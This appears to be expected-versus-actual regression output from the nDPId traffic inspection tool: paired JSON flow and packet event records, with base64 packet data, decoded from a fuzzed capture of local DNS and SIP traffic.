00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470219780,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00411{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtSm4lcwBFAABEasIAAIARTJPAqAECwKgBAQrLADUAMHT6r\/kAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00397{"packet_event_id":1,"packet_event_name":"packet","packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":29440,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470219780,"pkt":"ADBUADRWAODtSm4lcwBFAABEasIAAIARTJPAqAECwKgBAQrLADUAMHT6r\/kAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470233791} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":319,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":29440,"global_ts_msec":1120470233791}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1120470233792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470233792,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CssAR1d2r\/mAAAAmcwEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAYAAJxAACwlsb2NhbGhvc3QA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1120470233792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470233792,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CssAR1d2r\/mAAAAmcwEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAYAAJxAACwlsb2NhbGhvc3QA"}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470233792,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":38,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01455{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":2176,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233792,"pkt":"ADBUADRWAODtAW69CIBFAANVaMMAAIARFRXAqAEC1PIhIxPEE8QDQYjhSU5WSVRFIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQL1MuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnA4NTIxMzY5NC00MzBhYTFkZTGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01441{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":2176,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233792,"pkt":"ADBUADRWAODtAW69CIBFAANVaMMAAIARFRXAqAEC1PIhIxPEE8QDQYjhSU5WSVRFIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQL1MuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnA4NTIxMzY5NC00MzBhYTFkZTGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2176,"global_ts_msec":1120470233794} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":321,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2176,"global_ts_msec":1120470233794}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1120470233796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAODtAW69CABFAABIasQAAIARTI3AqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1120470233796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAODtAW69CABFAABIasQAAIARTI3AqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470233796,"flow_last_seen":1120470233796,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470233796,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01456{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01442{"packet_event_id":1,"packet_event_name":"packet","packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":867,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":867,"pkt_l4_len":0,"thread_ts_msec":1120470233796,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470234292} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":323,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470234292}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1120470234792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470234792,"pkt":"ADBUADRWAODtAW69CABFAABIasYAAIARTIvAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1120470234792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470234792,"pkt":"ADBUADRWAODtAW69CABFAABIasYAAIARTIvAqAECwKgBAQrMADUANEn93\/sBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470236795,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470236795,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1120470236795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470236795,"pkt":"ADBUADRWAODtAW69CABFAABIaskAAIARTIjAqAECqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1120470236795,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470236795,"pkt":"ADBUADRWAODtAW69CABFAABIaskAAIARTIjAqAECqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
@@ -596,8 +596,8 @@
